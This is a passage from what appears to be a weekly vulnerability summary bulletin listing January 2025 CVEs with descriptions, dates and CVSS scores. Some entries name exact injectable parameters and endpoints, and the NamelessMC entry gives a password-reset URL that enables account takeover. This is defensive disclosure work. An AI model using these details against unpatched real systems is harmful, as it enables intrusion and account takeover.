An issue was discovered in Samsung Mobile Processor and Modem Exynos 9820, 9825, 980, 990, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 9110, W1000, Modem 5123, Modem 5300, Modem 5400. UE does not limit the number of attempts for the RRC Setup procedure in the 5G SA, leading to a denial of service (battery-drain attack). | 2025-01-13 | not yet calculated | CVE-2024-46921 |
| n/a--n/a |
The HI-SCAN 6040i Hitrax HX-03-19-I was discovered to transmit user credentials in cleartext over the GIOP protocol. This allows attackers to possibly gain access to sensitive information via a man-in-the-middle attack. | 2025-01-15 | not yet calculated | CVE-2024-48121 |
| n/a--n/a |
Insecure default configurations in HI-SCAN 6040i Hitrax HX-03-19-I allow authenticated attackers with low-level privileges to escalate to root-level privileges. | 2025-01-15 | not yet calculated | CVE-2024-48122 |
| n/a--n/a |
An issue in the USB Autorun function of HI-SCAN 6040i Hitrax HX-03-19-I allows attackers to execute arbitrary code via uploading a crafted script from a USB device. | 2025-01-15 | not yet calculated | CVE-2024-48123 |
| n/a--n/a |
An issue in Eugeny Tabby 1.0.213 allows a remote attacker to obtain sensitive information via the server and sends the SSH username and password even when the host key verification fails. | 2025-01-16 | not yet calculated | CVE-2024-48460 |
| n/a--n/a |
An issue in GestioIP v3.5.7 allows a remote attacker to execute arbitrary code via the file upload function. The attacker can upload a malicious perlcmd.cgi file that overwrites the original upload.cgi file, enabling remote command execution. | 2025-01-14 | not yet calculated | CVE-2024-48760 |
| n/a--n/a |
The /rest/rights/ REST API endpoint in Becon DATAGerry through 2.2.0 contains an Incorrect Access Control vulnerability. An attacker can remotely access this endpoint without authentication, leading to unauthorized disclosure of sensitive information. | 2025-01-17 | not yet calculated | CVE-2024-50967 |
| n/a--n/a |
Insecure permissions in the XNetSocketClient component of XINJE XDPPro.exe v3.2.2 to v3.7.17c allows attackers to execute arbitrary code via modification of the configuration file. | 2025-01-15 | not yet calculated | CVE-2024-52783 |
| n/a--n/a |
An issue in OPEXUS FOIAXPRESS PUBLIC ACCESS LINK v11.1.0 allows attackers to bypass authentication via crafted web requests. | 2025-01-16 | not yet calculated | CVE-2024-53553 |
| n/a--n/a |
A remote code execution (RCE) vulnerability in Arcadyan Meteor 2 CPE FG360 Firmware ETV2.10 allows attackers to execute arbitrary code via a crafted request. | 2025-01-14 | not yet calculated | CVE-2024-53561 |
| n/a--n/a |
A JNDI injection issue was discovered in Cloudera JDBC Connector for Hive before 2.6.26 and JDBC Connector for Impala before 2.6.35. Attackers can inject malicious parameters into the JDBC URL, triggering JNDI injection during the process when the JDBC Driver uses this URL to connect to the database. This could lead to remote code execution. JNDI injection is possible via the JDBC connection property krbJAASFile for the Java Authentication and Authorization Service (JAAS). Using untrusted parameters in the krbJAASFile and/or remote host can trigger JNDI injection in the JDBC URL through the krbJAASFile. | 2025-01-16 | not yet calculated | CVE-2024-54660 |
| n/a--n/a |
A null pointer dereference vulnerability in Macrium Reflect prior to 8.1.8017 allows an attacker to elevate their privileges via executing a specially crafted executable. | 2025-01-16 | not yet calculated | CVE-2024-55511 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "week" parameter in setWiFiScheduleCfg. | 2025-01-15 | not yet calculated | CVE-2024-57023 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "eMinute" parameter in setWiFiScheduleCfg. | 2025-01-15 | not yet calculated | CVE-2024-57024 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "desc" parameter in setWiFiScheduleCfg. | 2025-01-15 | not yet calculated | CVE-2024-57025 |
| n/a--n/a |
WeGIA < 3.2.0 is vulnerable to SQL Injection in /funcionario/remuneracao.php via the id_funcionario parameter. | 2025-01-17 | not yet calculated | CVE-2024-57031 |
| n/a--n/a |
WeGIA < 3.2.0 is vulnerable to Incorrect Access Control in controle/control.php. The application does not validate the value of the old password, so it is possible to change the password by placing any value in the senha_antiga field. | 2025-01-17 | not yet calculated | CVE-2024-57032 |
| n/a--n/a |
WeGIA < 3.2.0 is vulnerable to Cross Site Scripting (XSS) via the dados_addInfo parameter of documentos_funcionario.php. | 2025-01-17 | not yet calculated | CVE-2024-57033 |
| n/a--n/a |
WeGIA < 3.2.0 is vulnerable to SQL Injection in query_geracao_auto.php via the query parameter. | 2025-01-17 | not yet calculated | CVE-2024-57034 |
| n/a--n/a |
WeGIA v3.2.0 is vulnerable to SQL Injection viathe nextPage parameter in /controle/control.php. | 2025-01-17 | not yet calculated | CVE-2024-57035 |
| n/a--n/a |
07FLYCMS V1.3.9 was discovered to contain a Cross-Site Request Forgery (CSRF) via /erp.07fly.net:80/oa/OaWorkReport/add.html. | 2025-01-16 | not yet calculated | CVE-2024-57159 |
| n/a--n/a |
07FLYCMS V1.3.9 was discovered to contain a Cross-Site Request Forgery (CSRF) via /erp.07fly.net:80/oa/OaTask/edit.html. | 2025-01-16 | not yet calculated | CVE-2024-57160 |
| n/a--n/a |
07FLYCMS V1.3.9 was discovered to contain a Cross-Site Request Forgery (CSRF) via /erp.07fly.net:80/oa/OaWorkReport/edit.html | 2025-01-16 | not yet calculated | CVE-2024-57161 |
| n/a--n/a |
Clickjacking vulnerability in typecho v1.2.1. | 2025-01-17 | not yet calculated | CVE-2024-57369 |
| n/a--n/a |
Cross Site Scripting vulnerability in sunnygkp10 Online Exam System master version allows a remote attacker to obtain sensitive information via the w parameter. | 2025-01-17 | not yet calculated | CVE-2024-57370 |
| n/a--n/a |
H3C N12 V100R005 contains a buffer overflow vulnerability due to the lack of length verification in the 2.4G wireless network processing function. Attackers who successfully exploit this vulnerability can cause the remote target device to crash or execute arbitrary commands by sending a POST request to /bin/webs. | 2025-01-14 | not yet calculated | CVE-2024-57471 |
| n/a--n/a |
H3C N12 V100R005 contains a buffer overflow vulnerability due to the lack of length verification in the 5G wireless network processing function. Attackers who successfully exploit this vulnerability can cause the remote target device to crash or execute arbitrary commands by sending a POST request to /bin/webs. | 2025-01-14 | not yet calculated | CVE-2024-57482 |
| n/a--n/a |
Tenda AC18 V15.03.05.19 was discovered to contain a stack overflow via the ssid parameter in the form_fast_setting_wifi_set function. | 2025-01-16 | not yet calculated | CVE-2024-57575 |
| n/a--n/a |
Tenda AC18 V15.03.05.19 was discovered to contain a command injection vulnerability via the usbName parameter in the formSetSambaConf function. | 2025-01-16 | not yet calculated | CVE-2024-57583 |
| n/a--n/a |
07FLYCMS V1.3.9 was discovered to contain a Cross-Site Request Forgery (CSRF) via admin/doAdminAction.php?act=editShop&shopId. | 2025-01-16 | not yet calculated | CVE-2024-57611 |
| n/a--n/a |
An issue in the sqlg_hash_source component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | not yet calculated | CVE-2024-57662 |
| n/a--n/a |
An issue in the sqlg_place_dpipes component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | not yet calculated | CVE-2024-57663 |
| n/a--n/a |
An issue in the sqlg_group_node component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | not yet calculated | CVE-2024-57664 |
| n/a--n/a |
An access control issue in the component form2WlanBasicSetup.cgi of D-Link 816A2_FWv1.10CNB05_R1B011D88210 allows unauthenticated attackers to set the 2.4G and 5G wlan service of the device via a crafted POST request. | 2025-01-16 | not yet calculated | CVE-2024-57676 |
| n/a--n/a |
An access control issue in the component form2Wan.cgi of D-Link 816A2_FWv1.10CNB05_R1B011D88210 allows unauthenticated attackers to set the wan service of the device via a crafted POST request. | 2025-01-16 | not yet calculated | CVE-2024-57677 |
| n/a--n/a |
An access control issue in the component form2WlAc.cgi of D-Link 816A2_FWv1.10CNB05_R1B011D88210 allows unauthenticated attackers to set the 2.4G and 5G mac access control list of the device via a crafted POST request. | 2025-01-16 | not yet calculated | CVE-2024-57678 |
| n/a--n/a |
An access control issue in the component form2RepeaterSetup.cgi of D-Link 816A2_FWv1.10CNB05_R1B011D88210 allows unauthenticated attackers to set the 2.4G and 5G repeater service of the device via a crafted POST request. | 2025-01-16 | not yet calculated | CVE-2024-57679 |
| n/a--n/a |
An access control issue in the component form2PortriggerRule.cgi of D-Link 816A2_FWv1.10CNB05_R1B011D88210 allows unauthenticated attackers to set the port trigger of the device via a crafted POST request. | 2025-01-16 | not yet calculated | CVE-2024-57680 |
| n/a--n/a |
An access control issue in the component form2alg.cgi of D-Link 816A2_FWv1.10CNB05_R1B011D88210 allows unauthenticated attackers to set the agl service of the device via a crafted POST request. | 2025-01-16 | not yet calculated | CVE-2024-57681 |
| n/a--n/a |
An information disclosure vulnerability in the component d_status.asp of D-Link 816A2_FWv1.10CNB05_R1B011D88210 allows unauthenticated attackers to access sensitive information via a crafted POST request. | 2025-01-16 | not yet calculated | CVE-2024-57682 |
| n/a--n/a |
An access control issue in the component websURLFilterAddDel of D-Link 816A2_FWv1.10CNB05_R1B011D88210 allows unauthenticated attackers to set the filter settings of the device via a crafted POST request. | 2025-01-16 | not yet calculated | CVE-2024-57683 |
| n/a--n/a |
Tenda AC8v4 V16.03.34.06 has a stack overflow vulnerability. Affected by this vulnerability is the function setSchedWifi of the file /goform/openSchedWifi. The manipulation of the argument schedEndTime leads to stack-based buffer overflow. | 2025-01-16 | not yet calculated | CVE-2024-57703 |
| n/a--n/a |
Tenda AC8v4 V16.03.34.06 has a stack overflow vulnerability. Affected by this vulnerability is the function setSchedWifi of the file /goform/openSchedWifi. The manipulation of the argument schedStartTime leads to stack-based buffer overflow. | 2025-01-16 | not yet calculated | CVE-2024-57704 |
| n/a--n/a |
JeeWMS before v2025.01.01 was discovered to contain a permission bypass in the component /interceptors/AuthInterceptor.cava. | 2025-01-15 | not yet calculated | CVE-2024-57757 |
| n/a--n/a |
JeeWMS before v2025.01.01 was discovered to contain a SQL injection vulnerability via the ReportId parameter at /core/CGReportDao.java. | 2025-01-15 | not yet calculated | CVE-2024-57760 |
| n/a--n/a |
An arbitrary file upload vulnerability in the parserXML() method of JeeWMS before v2025.01.01 allows attackers to execute arbitrary code via uploading a crafted file. | 2025-01-15 | not yet calculated | CVE-2024-57761 |
| n/a--n/a |
MSFM before v2025.01.01 was discovered to contain a deserialization vulnerability via the pom.xml configuration file. | 2025-01-15 | not yet calculated | CVE-2024-57762 |
| n/a--n/a |
MSFM before 2025.01.01 was discovered to contain a fastjson deserialization vulnerability via the component system/table/addField. | 2025-01-15 | not yet calculated | CVE-2024-57763 |
| n/a--n/a |
MSFM before 2025.01.01 was discovered to contain a fastjson deserialization vulnerability via the component system/table/add. | 2025-01-15 | not yet calculated | CVE-2024-57764 |
| n/a--n/a |
MSFM before 2025.01.01 was discovered to contain a SQL injection vulnerability via the s_name parameter at table/list. | 2025-01-15 | not yet calculated | CVE-2024-57765 |
| n/a--n/a |
MSFM before 2025.01.01 was discovered to contain a fastjson deserialization vulnerability via the component system/table/editField. | 2025-01-15 | not yet calculated | CVE-2024-57766 |
| n/a--n/a |
MSFM before v2025.01.01 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /file/download. | 2025-01-15 | not yet calculated | CVE-2024-57767 |
| n/a--n/a |
JFinalOA before v2025.01.01 was discovered to contain a SQL injection vulnerability via the component borrowmoney/listData?applyUser. | 2025-01-16 | not yet calculated | CVE-2024-57769 |
| n/a--n/a |
JFinalOA before v2025.01.01 was discovered to contain a SQL injection vulnerability via the component apply/save#oaContractApply.id. | 2025-01-16 | not yet calculated | CVE-2024-57770 |
| n/a--n/a |
A cross-site scripting (XSS) vulnerability in the common/getEditPage?view interface of JFinalOA before v2025.01.01 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2025-01-16 | not yet calculated | CVE-2024-57771 |
| n/a--n/a |
A cross-site scripting (XSS) vulnerability in the /bumph/getDraftListPage?type interface of JFinalOA before v2025.01.01 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2025-01-16 | not yet calculated | CVE-2024-57772 |
| n/a--n/a |
A cross-site scripting (XSS) vulnerability in the openSelectManyUserPage?orgid interface of JFinalOA before v2025.01.01 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2025-01-16 | not yet calculated | CVE-2024-57773 |
| n/a--n/a |
A cross-site scripting (XSS) vulnerability in the getBusinessUploadListPage?busid interface of JFinalOA before v2025.01.01 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2025-01-16 | not yet calculated | CVE-2024-57774 |
| n/a--n/a |
JFinalOA before v2025.01.01 was discovered to contain a SQL injection vulnerability via the component getWorkFlowHis?insid. | 2025-01-16 | not yet calculated | CVE-2024-57775 |
| n/a--n/a |
A cross-site scripting (XSS) vulnerability in the /apply/getEditPage?view interface of JFinalOA before v2025.01.01 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2025-01-16 | not yet calculated | CVE-2024-57776 |
| n/a--n/a |
An issue in the component /php/script_uploads.php of Zenitel AlphaWeb XE v11.2.3.10 allows attackers to execute a directory traversal. | 2025-01-16 | not yet calculated | CVE-2024-57784 |
| n/a--n/a |
Zenitel AlphaWeb XE v11.2.3.10 was discovered to contain a local file inclusion vulnerability via the component amc_uploads.php. | 2025-01-16 | not yet calculated | CVE-2024-57785 |
| n/a--n/a |
SQL Injection vulnerability in DDSN Net Pty Ltd (DDSN Interactive) DDSN Interactive cm3 Acora CMS 10.1.1 allows an attacker to execute arbitrary code via the table parameter. | 2025-01-15 | not yet calculated | CVE-2025-22964 |
| n/a--n/a |
SQL Injection vulnerability in dingfanzuCMS v.1.0 allows a local attacker to execute arbitrary code via not filtering the content correctly at the "checkOrder.php" shopId module. | 2025-01-15 | not yet calculated | CVE-2025-22976 |
| n/a--n/a |
An access control issue in the component /square/getAllSquare/circle of iceCMS v2.2.0 allows unauthenticated attackers to access sensitive information. | 2025-01-14 | not yet calculated | CVE-2025-22983 |
| n/a--n/a |
An access control issue in the component /api/squareComment/DelectSquareById of iceCMS v2.2.0 allows unauthenticated attackers to access sensitive information. | 2025-01-14 | not yet calculated | CVE-2025-22984 |
| NamelessMC--Nameless |
NamelessMC is a free, easy to use & powerful website software for Minecraft servers. In affected versions an admin can add the ability to have users fill out an additional field and users can inject javascript code into it that would be activated once a staffer visits the user's profile on staff panel. As a result an attacker can execute javascript code on the staffer's computer. This issue has been addressed in version 2.1.3 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-13 | not yet calculated | CVE-2025-22142 |
| NamelessMC--Nameless |
NamelessMC is a free, easy to use & powerful website software for Minecraft servers. A user with admincp.core.emails or admincp.users.edit permissions can validate users and an attacker can reset their password. When the account is successfully approved by email the reset code is NULL, but when the account is manually validated by a user with admincp.core.emails or admincp.users.edit permissions then the reset_code will no longer be NULL but empty. An attacker can request http://localhost/nameless/index.php?route=/forgot_password/&c= and reset the password. As a result an attacker may compromise another users password and take over their account. This issue has been addressed in release version 2.1.3 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-13 | not yet calculated | CVE-2025-22144 |
| Newtec/iDirect--NTC2218, NTC2250, NTC2299 |
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Newtec/iDirect NTC2218, NTC2250, NTC2299 on Linux, PowerPC, ARM allows Local Code Inclusion.This issue affects NTC2218, NTC2250, NTC2299: from 1.0.1.1 through 2.2.6.19. The `commit_multicast` page used to configure multicasts in the modem's web administration interface uses improperly parses incoming data from the request before passing it to an `eval` statement in a bash script. This allows attackers to inject arbitrary shell commands. | 2025-01-17 | not yet calculated | CVE-2024-13502 |
| Newtec/iDirect--NTC2218, NTC2250, NTC2299 |
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in Newtec NTC2218, NTC2250, NTC2299 on Linux, PowerPC, ARM (Updating signaling process in the swdownload binary modules) allows Local Execution of Code, Remote Code Inclusion. This issue affects NTC2218, NTC2250, NTC2299: from 1.0.1.1 through 2.2.6.19. The issue is both present on the PowerPC versions of the modem and the ARM versions. A stack buffer buffer overflow in the swdownload binary allows attackers to execute arbitrary code. The parse_INFO function uses an unrestricted `sscanf` to read a string of an incoming network packet into a statically sized buffer. | 2025-01-17 | not yet calculated | CVE-2024-13503 |
| openfga--openfga |
OpenFGA is an authorization/permission engine. IN OpenFGA v1.3.8 to v1.8.2 (Helm chart openfga-0.1.38 to openfga-0.2.19, docker v1.3.8 to v.1.8.2) are vulnerable to authorization bypass under the following conditions: 1. calling Check API or ListObjects with a model that uses [conditions](https://openfga.dev/docs/modeling/conditions), and 2. calling Check API or ListObjects API with [contextual tuples](https://openfga.dev/docs/concepts#what-are-contextual-tuples) that include conditions and 3. OpenFGA is configured with caching enabled (`OPENFGA_CHECK_QUERY_CACHE_ENABLED`). Users are advised to upgrade to v1.8.3. There are no known workarounds for this vulnerability. | 2025-01-13 | not yet calculated | CVE-2024-56323 |
| OpenText--Solutions Business Manager (SBM) |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in OpenTextâ„¢ Solutions Business Manager (SBM) allows Stored XSS. The vulnerability could result in the exposure of private information to an unauthorized actor. This issue affects Solutions Business Manager (SBM): through 12.2.1. | 2025-01-15 | not yet calculated | CVE-2024-7085 |
| Roche Diagnostics--Algorithm Suite |
A vulnerability exists in Algo Edge up to 2.1.1 - a previously used (legacy) component of navify® Algorithm Suite. The vulnerability impacts the authentication mechanism of this component and could allow an attacker with adjacent access to the laboratory network and the Algo Edge system to craft valid authentication tokens and access the component. Other components of navify® Algorithm Suite are not affected. | 2025-01-17 | not yet calculated | CVE-2024-13026 |
| Schneider Electric--EcoStruxure Power Build Rapsody |
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability exists that could allow local attackers to exploit these issues to potentially execute arbitrary code when opening a malicious project file. | 2025-01-17 | not yet calculated | CVE-2024-11139 |
| The Dimensional Gate Co.--Linux Ratfor |
Stack-based buffer overflow vulnerability exists in Linux Ratfor 1.06 and earlier. When the software processes a file which is specially crafted by an attacker, arbitrary code may be executed. As a result, the attacker may obtain or alter information of the user environment or cause the user environment to become unusable. | 2025-01-15 | not yet calculated | CVE-2024-55577 |
| Unknown--List category posts |
The List category posts WordPress plugin before 0.90.3 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2025-01-18 | not yet calculated | CVE-2024-9020 |
| Veeam--Backup for Microsoft Azure |
Veeam Backup for Microsoft Azure is vulnerable to Server-Side Request Forgery (SSRF). This may allow an unauthenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. | 2025-01-14 | not yet calculated | CVE-2025-23082 |
| vyperlang--vyper |
Vyper is a Pythonic Smart Contract Language for the EVM. When the Vyper Compiler uses the precompiles EcRecover (0x1) and Identity (0x4), the success flag of the call is not checked. As a consequence an attacker can provide a specific amount of gas to make these calls fail but let the overall execution continue. Then the execution result can be incorrect. Based on EVM's rules, after the failed precompile the remaining code has only 1/64 of the pre-call-gas left (as 63/64 were forwarded and spent). Hence, only fairly simple executions can follow the failed precompile calls. Therefore, we found no significantly impacted real-world contracts. None the less an advisory has been made out of an abundance of caution. There are no actions for users to take. | 2025-01-14 | not yet calculated | CVE-2025-21607 |
| Wikimedia Foundation--Mediawiki - GlobalBlocking Extension |
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation Mediawiki - GlobalBlocking Extension allows Retrieve Embedded Sensitive Data. This issue briefly impacted the master branch of MediaWiki's GlobalBlocking Extension. | 2025-01-14 | not yet calculated | CVE-2025-23073 |
| Wikimedia Foundation--Mediawiki - RefreshSpecial Extension |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - RefreshSpecial Extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - RefreshSpecial Extension: from 1.39.X before 1.39.11, from 1.41.X before 1.41.3, from 1.42.X before 1.42.2. | 2025-01-14 | not yet calculated | CVE-2025-23072 |
| Wikimedia Foundation--Mediawiki - SocialProfile Extension |
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation Mediawiki - SocialProfile Extension allows Functionality Misuse.This issue affects Mediawiki - SocialProfile Extension: from 1.39.X before 1.39.11, from 1.41.X before 1.41.3, from 1.42.X before 1.42.2. | 2025-01-14 | not yet calculated | CVE-2025-23074 |
| Yubico--pam-u2f |
In Yubico pam-u2f before 1.3.1, local privilege escalation can sometimes occur. This product implements a Pluggable Authentication Module (PAM) that can be deployed to support authentication using a YubiKey or other FIDO compliant authenticators on macOS or Linux. This software package has an issue that allows for an authentication bypass in some configurations. An attacker would require the ability to access the system as an unprivileged user. Depending on the configuration, the attacker may also need to know the user's password. | 2025-01-15 | not yet calculated | CVE-2025-23013 |
| zulip--zulip |
Zulip server provides an open-source team chat that helps teams stay productive and focused. Zulip Server 7.0 and above are vulnerable to an information disclose attack, where, if a Zulip server is hosting multiple organizations, an unauthenticated user can make a request and determine if an email address is in use by a user. Zulip Server 9.4 resolves the issue, as does the `main` branch of Zulip Server. Users are advised to upgrade. There are no known workarounds for this issue. | 2025-01-16 | not yet calculated | CVE-2024-56136 |
Vulnerability Summary for the Week of January 6, 2025
Posted on Monday January 13, 2025
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 5centsCDN--5centsCDN |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 5centsCDN 5centsCDN allows Reflected XSS.This issue affects 5centsCDN: from n/a through 24.8.16. | 2025-01-07 | 7.1 | CVE-2025-22326 |
| a3rev--Compare Products for WooCommerce |
The Compare Products for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.2.1 via deserialization of untrusted input from the 'woo_compare_list' cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. | 2025-01-07 | 8.1 | CVE-2024-12313 |
| ABB--AC500 V3 |
An attacker who successfully exploited these vulnerabilities could cause enable command execution. A vulnerability exists in the AC500 V3 version mentioned. After successfully exploiting CVE-2024-12429 (directory traversal), a successfully authenticated attacker can inject arbitrary commands into a specifically crafted file, which then will be executed by root user. All AC500 V3 products (PM5xxx) with firmware version earlier than 3.8.0 are affected by this vulnerability. | 2025-01-07 | 7 | CVE-2024-12430 |
| Abdul Hakeem--Build App Online |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Abdul Hakeem Build App Online allows PHP Local File Inclusion.This issue affects Build App Online: from n/a through 1.0.23. | 2025-01-07 | 9.8 | CVE-2024-49649 |
| AllAccessible Team--Accessibility by AllAccessible |
Incorrect Privilege Assignment vulnerability in AllAccessible Team Accessibility by AllAccessible allows Privilege Escalation.This issue affects Accessibility by AllAccessible: from n/a through 1.3.4. | 2025-01-07 | 8.8 | CVE-2024-49644 |
| Amento Tech Pvt ltd--WPGuppy |
Deserialization of Untrusted Data vulnerability in Amento Tech Pvt ltd WPGuppy allows Object Injection.This issue affects WPGuppy: from n/a through 1.1.0. | 2025-01-07 | 9.8 | CVE-2024-49222 |
| Amento Tech Pvt ltd--WPGuppy |
Incorrect Privilege Assignment vulnerability in Amento Tech Pvt ltd WPGuppy allows Privilege Escalation.This issue affects WPGuppy: from n/a through 1.1.0. | 2025-01-07 | 8.8 | CVE-2024-56280 |
| Andon Ivanov--OZ Canonical |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Andon Ivanov OZ Canonical allows Reflected XSS.This issue affects OZ Canonical: from n/a through 0.5. | 2025-01-07 | 7.1 | CVE-2025-22324 |
| Apache Software Foundation--Apache Airflow Fab Provider |
Insufficient Session Expiration vulnerability in Apache Airflow Fab Provider. This issue affects Apache Airflow Fab Provider: before 1.5.2. When user password has been changed with admin CLI, the sessions for that user have not been cleared, leading to insufficient session expiration, thus logged users could continue to be logged in even after the password was changed. This only happened when the password was changed with CLI. The problem does not happen in case change was done with webserver thus this is different from CVE-2023-40273 https://github.com/advisories/GHSA-pm87-24wq-r8w9  which was addressed in Apache-Airflow 2.7.0 Users are recommended to upgrade to version 1.5.2, which fixes the issue. | 2025-01-08 | 8.1 | CVE-2024-45033 |
| Apache Software Foundation--Apache OpenMeetings |
Vendor: The Apache Software Foundation Versions Affected: Apache OpenMeetings from 2.1.0 before 8.0.0 Description: Default clustering instructions at https://openmeetings.apache.org/Clustering.html  doesn't specify white/black lists for OpenJPA this leads to possible deserialisation of untrusted data. Users are recommended to upgrade to version 8.0.0 and update their startup scripts to include the relevant 'openjpa.serialization.class.blacklist' and 'openjpa.serialization.class.whitelist' configurations as shown in the documentation. | 2025-01-08 | 9.8 | CVE-2024-54676 |
| Apple--Smart Card Services |
This issue is fixed in SCSSU-201801. A potential stack based buffer overflow existed in GemaltoKeyHandle.cpp. | 2025-01-08 | 9.8 | CVE-2018-4301 |
| Arista Networks--Arista Edge Threat Management |
Backup uploads to ETM subject to man-in-the-middle interception | 2025-01-10 | 8.3 | CVE-2024-47519 |
| Arista Networks--Arista Edge Threat Management |
The administrator is able to configure an insecure captive portal script | 2025-01-10 | 8.1 | CVE-2024-9132 |
| Arista Networks--Arista Edge Threat Management |
Multiple SQL Injection vulnerabilities exist in the reporting application. A user with advanced report application access rights can exploit the SQL injection, allowing them to execute commands on the underlying operating system with elevated privileges. | 2025-01-10 | 8.3 | CVE-2024-9134 |
| Arista Networks--Arista Edge Threat Management |
Specially constructed queries cause cross platform scripting leaking administrator tokens | 2025-01-10 | 8.8 | CVE-2024-9188 |
| Arista Networks--Arista Edge Threat Management |
A user with advanced report application access rights can perform actions for which they are not authorized | 2025-01-10 | 7.6 | CVE-2024-47520 |
| Arista Networks--Arista Edge Threat Management |
A user with administrator privileges can perform command injection | 2025-01-10 | 7.2 | CVE-2024-9131 |
| arrowplugins--Popup MailChimp, GetResponse and ActiveCampaign Intergrations |
The Popup - MailChimp, GetResponse and ActiveCampaign Intergrations plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter of the 'upc_delete_db_record' AJAX action in all versions up to, and including, 3.2.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-01-07 | 7.5 | CVE-2024-12157 |
| Atheos--Atheos |
Atheos is a self-hosted browser-based cloud IDE. Prior to v600, the $path and $target parameters are not properly validated across multiple components, allowing an attacker to read, modify, or execute arbitrary files on the server. These vulnerabilities can be exploited through various attack vectors present in multiple PHP files. This vulnerability is fixed in v600. | 2025-01-10 | 9.1 | CVE-2025-22152 |
| Aviatrix--Controller |
An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test. | 2025-01-08 | 10 | CVE-2024-50603 |
| Balcom-Vetillo Design, Inc.--BVD Easy Gallery Manager |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Balcom-Vetillo Design, Inc. BVD Easy Gallery Manager allows Reflected XSS.This issue affects BVD Easy Gallery Manager: from n/a through 1.0.6. | 2025-01-07 | 7.1 | CVE-2025-22353 |
| BannerSky.com--BSK Forms Blacklist |
Cross-Site Request Forgery (CSRF) vulnerability in BannerSky.com BSK Forms Blacklist allows Blind SQL Injection.This issue affects BSK Forms Blacklist: from n/a through 3.9. | 2025-01-07 | 8.2 | CVE-2025-22347 |
| beardev--JoomSport for Sports: Team & League, Football, Hockey & more |
The JoomSport - for Sports: Team & League, Football, Hockey & more plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page parameter in all versions up to, and including, 5.6.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 7.1 | CVE-2024-12633 |
| Benjamin Santalucia (ben@woow-fr.com)--WPMU Prefill Post |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Benjamin Santalucia (ben@woow-fr.com) WPMU Prefill Post allows SQL Injection.This issue affects WPMU Prefill Post: from n/a through 1.02. | 2025-01-07 | 7.6 | CVE-2025-22507 |
| bozdoz--Quote Tweet |
Cross-Site Request Forgery (CSRF) vulnerability in bozdoz Quote Tweet allows Stored XSS.This issue affects Quote Tweet: from n/a through 0.7. | 2025-01-07 | 7.1 | CVE-2025-22589 |
| Burria--Laika Pedigree Tree |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Burria Laika Pedigree Tree allows Stored XSS.This issue affects Laika Pedigree Tree: from n/a through 1.4. | 2025-01-07 | 7.1 | CVE-2025-22593 |
| chatwoot--chatwoot |
Chatwoot is a customer engagement suite. Prior to 3.16.0, conversation and contact filters endpoints did not sanitize the input of query_operator passed from the frontend or the API. This provided any actor who is authenticated, an attack vector to run arbitrary SQL within the filter query by adding a tautological WHERE clause. This issue is patched with v3.16.0. | 2025-01-09 | 9.1 | CVE-2025-21628 |
| Classic Addons--Classic Addons WPBakery Page Builder |
